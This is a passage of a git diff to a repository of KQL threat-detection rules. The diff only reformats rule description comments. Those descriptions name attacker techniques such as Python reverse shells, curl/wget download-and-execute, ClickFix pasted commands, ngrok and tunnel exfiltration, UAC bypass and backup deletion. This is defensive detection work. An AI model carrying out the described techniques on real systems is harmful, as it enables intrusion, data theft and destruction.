products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. +// This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082 // False Positives: diff --git a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql index c95fcd22..52b1b857 100644 --- a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql +++ b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql @@ -3,7 +3,6 @@ // Date: 2024-05-27 // Level: medium // Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204.002 // False Positives: diff --git a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql index 29371d73..877e0a90 100644 --- a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql +++ b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql @@ -3,8 +3,7 @@ // Date: 2024-11-01 // Level: high // Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. -This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. - +// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001 diff --git a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql index 838b3eab..c8b3ebc3 100644 --- a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql +++ b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql @@ -3,8 +3,7 @@ // Date: 2019-11-14 // Level: medium // Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. -Detects behavior similar to meterpreter's "load powershell" extension. - +// Detects behavior similar to meterpreter's "load powershell" extension. // MITRE Tactic: Execution // Tags: attack.t1059.001, attack.execution // False Positives: diff --git a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql index 272c80d0..96a353f1 100644 --- a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql +++ b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql @@ -3,10 +3,9 @@ // Date: 2025-06-05 // Level: medium // Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the -Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely. -This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality. -And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection. - +// Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely. +// This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality. +// And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 diff --git a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql index b4a96c2a..62468ada 100644 --- a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql +++ b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql @@ -3,7 +3,6 @@ // Date: 2023-04-24 // Level: high // Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell. - // MITRE Tactic: Execution // Tags: attack.execution diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql index fbb6a34e..bc26a317 100644 --- a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql +++ b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql @@ -3,7 +3,6 @@ // Date: 2022-06-03 // Level: medium // Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 diff --git a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql index da1cace6..49adea19 100644 --- a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql +++ b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql @@ -3,10 +3,9 @@ // Date: 2024-02-08 // Level: medium // Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. -Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. -Use this rule to detect instances of older versions of Anydesk using the compromised certificate -This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. - +// Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. +// Use this rule to detect instances of older versions of Anydesk using the compromised certificate +// This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. // MITRE Tactic: Execution // Tags: attack.execution, attack.initial-access // False Positives: diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql index 10e57e1f..88143191 100644 --- a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql +++ b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql @@ -3,8 +3,7 @@ // Date: 2023-10-10 // Level: low // Description: Detects the creation of files in a specific location by ScreenConnect RMM. -ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. - +// ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.003 // False Positives: diff --git a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql index 7067667c..15bca231 100644 --- a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql @@ -3,10 +3,9 @@ // Date: 2023-02-14 // Level: medium // Description: An adversary might use WMI to check if a certain remote service is running on a remote device. -When the test completes, a service information will be displayed on the screen if it exists. -A common feedback message is that "No instance(s) Available" if the service queried is not running. -A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable - +// When the test completes, a service information will be displayed on the screen if it exists. +// A common feedback message is that "No instance(s) Available" if the service queried is not running. +// A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable // MITRE Tactic: Execution // Tags: attack.execution, attack.t1047 diff --git a/KQL/rules/Execution/shell_execution_via_git_linux.kql b/KQL/rules/Execution/shell_execution_via_git_linux.kql index fb6507ce..fe7759bb 100644 --- a/KQL/rules/Execution/shell_execution_via_git_linux.kql +++ b/KQL/rules/Execution/shell_execution_via_git_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 diff --git a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql index 2505dcd6..aee469f9 100644 --- a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql +++ b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 // False Positives: diff --git a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql index 6a45c72d..d7349c88 100644 --- a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql +++ b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 // False Positives: diff --git a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql index 3a434d12..885ca822 100644 --- a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql +++ b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-08-29 // Level: high // Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 diff --git a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql index 3cab475f..5e7fe91b 100644 --- a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql +++ b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql @@ -3,8 +3,7 @@ // Date: 2020-10-13 // Level: medium // Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. -Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. - +// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 // False Positives: diff --git a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql index 92c83621..8827aa3e 100644 --- a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql +++ b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql @@ -3,8 +3,7 @@ // Date: 2025-05-22 // Level: low // Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. -This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno. - +// This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105 // False Positives: diff --git a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql index 2d79b7c4..764a41bf 100644 --- a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql +++ b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql @@ -3,10 +3,9 @@ // Date: 2025-06-17 // Level: high // Description: Detects suspicious use of command-line tools such as curl or wget to download remote -content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by -immediate execution, indicating potential malicious activity. This pattern is commonly used -by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks. - +// content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by +// immediate execution, indicating potential malicious activity. This pattern is commonly used +// by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.004, attack.t1203 // False Positives: diff --git a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql index ef5c9fd1..bacdf833 100644 --- a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql +++ b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql @@ -3,7 +3,6 @@ // Date: 2022-10-21 // Level: medium // Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) - // MITRE Tactic: Execution // Tags: attack.execution diff --git a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql index ed3f28b8..012aac26 100644 --- a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql +++ b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql @@ -3,9 +3,8 @@ // Date: 2025-11-04 // Level: high // Description: Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. -ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar. -The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view. - +// ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar. +// The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql index 193d7064..7806dd0d 100644 --- a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql +++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql @@ -3,8 +3,7 @@ // Date: 2024-09-02 // Level: high // Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. -This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. - +// This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql index caa45b9c..063c5e3f 100644 --- a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql +++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql @@ -3,7 +3,6 @@ // Date: 2025-01-18 // Level: high // Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059, attack.t1203 diff --git a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql index 9fc8ff46..ed803c53 100644 --- a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql +++ b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql @@ -3,7 +3,6 @@ // Date: 2025-11-04 // Level: high // Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 // False Positives: diff --git a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql index 41f0eae7..0665c764 100644 --- a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql +++ b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql @@ -3,7 +3,6 @@ // Date: 2025-11-04 // Level: high // Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 // False Positives: diff --git a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql index 5c5cb7fd..413f2168 100644 --- a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql @@ -3,9 +3,8 @@ // Date: 2024-02-02 // Level: medium // Description: An adversary might use WMI to discover information about the system, such as the volume name, size, -free space, and other disk information. This can be done using the 'wmic' command-line utility and has been -observed being used by threat actors such as Volt Typhoon. - +// free space, and other disk information. This can be done using the 'wmic' command-line utility and has been +// observed being used by threat actors such as Volt Typhoon. // MITRE Tactic: Execution // Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082 diff --git a/KQL/rules/Execution/use_of_fsharp_interpreters.kql b/KQL/rules/Execution/use_of_fsharp_interpreters.kql index b467cacc..d49fc8e5 100644 --- a/KQL/rules/Execution/use_of_fsharp_interpreters.kql +++ b/KQL/rules/Execution/use_of_fsharp_interpreters.kql @@ -3,8 +3,7 @@ // Date: 2022-06-02 // Level: medium // Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" -Both can be used for AWL bypass and to execute F# code via scripts or inline. - +// Both can be used for AWL bypass and to execute F# code via scripts or inline. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 // False Positives: diff --git a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql index 9fc9c3c8..ab9c6fc9 100644 --- a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql +++ b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql @@ -3,8 +3,7 @@ // Date: 2023-11-26 // Level: high // Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. -Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges. - +// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges. // MITRE Tactic: Execution // Tags: attack.execution diff --git a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql index eda1204f..059a5181 100644 --- a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql +++ b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql @@ -3,9 +3,8 @@ // Date: 2021-11-26 // Level: medium // Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. -Users can configure different pilot collections for each of the co-management workloads. -It can be abused by attackers in order to upload or download files. - +// Users can configure different pilot collections for each of the co-management workloads. +// It can be abused by attackers in order to upload or download files. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.t1567 diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql index e96ef768..1f8f07f6 100644 --- a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql +++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql @@ -3,9 +3,8 @@ // Date: 2022-11-03 // Level: high // Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. -Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. -While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. - +// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 // False Positives: diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql index 33cf9a91..88eeb015 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql @@ -3,8 +3,7 @@ // Date: 2024-09-13 // Level: medium // Description: Detects network connections to BTunnels domains initiated by a process on the system. -Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - +// Attackers can abuse that feature to establish a reverse shell or persistence on a machine. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 // False Positives: diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql index 78fc2960..bc91a970 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql @@ -3,8 +3,7 @@ // Date: 2024-05-27 // Level: medium // Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. -Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - +// Attackers can abuse that feature to establish a reverse shell or persistence on a machine. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 // False Positives: diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql index f415abb5..5999853b 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql @@ -3,7 +3,6 @@ // Date: 2023-11-20 // Level: medium // Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572 // False Positives: diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql index af4e15e6..d218d981 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql @@ -3,8 +3,7 @@ // Date: 2021-12-06 // Level: low // Description: Detects a network connection initiated by a binary to "api.mega.co.nz". -Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. - +// Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.t1567.002 // False Positives: diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql index 4d666698..c0337f00 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql @@ -3,7 +3,6 @@ // Date: 2023-11-20 // Level: medium // Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 // False Positives: diff --git a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql index dcb07426..8ab40157 100644 --- a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql +++ b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql @@ -3,9 +3,8 @@ // Date: 2022-07-16 // Level: high // Description: Detects an executable initiating a network connection to "ngrok" domains. -Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. -While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. - +// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102 // False Positives: diff --git a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql index 7ad87026..185731b4 100644 --- a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql +++ b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql @@ -3,9 +3,8 @@ // Date: 2025-10-17 // Level: high // Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration. -Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services. -If not legitimately used in the enterprise environment, its presence may indicate malicious activity. - +// Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services. +// If not legitimately used in the enterprise environment, its presence may indicate malicious activity. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.t1048, attack.t1567.002 // False Positives: diff --git a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql index 023d6cf5..2e97304e 100644 --- a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql +++ b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql @@ -3,9 +3,8 @@ // Date: 2025-10-17 // Level: medium // Description: Detects the execution of Python web servers via command line interface (CLI). -After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. -This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems. - +// After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. +// This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.t1048.003 // False Positives: diff --git a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql index da3bcea0..5a428f6c 100644 --- a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql +++ b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql @@ -3,8 +3,7 @@ // Date: 2022-01-07 // Level: medium // Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. -The data may also be sent to an alternate network location from the main command and control server. - +// The data may also be sent to an alternate network location from the main command and control server. // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.t1048.003 // False Positives: diff --git a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql index cab4b0a0..ce3cf983 100644 --- a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql +++ b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql @@ -3,7 +3,6 @@ // Date: 2023-03-16 // Level: high // Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 - // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397 diff --git a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql index 8651f814..2295277a 100644 --- a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql +++ b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql @@ -3,8 +3,7 @@ // Date: 2020-05-02 // Level: medium // Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". -This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). - +// This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). // MITRE Tactic: Exfiltration // Tags: attack.exfiltration, attack.t1048.003 diff --git a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql index 6675bce5..06f13399 100644 --- a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql +++ b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql @@ -3,9 +3,8 @@ // Date: 2021-12-13 // Level: high // Description: Detects the deletion of all backups or system state backups via "wbadmin.exe". -This technique is used by numerous ransomware families and actors. -This may only be successful on server platforms that have Windows Backup enabled. - +// This technique is used by numerous ransomware families and actors. +// This may only be successful on server platforms that have Windows Backup enabled. // MITRE 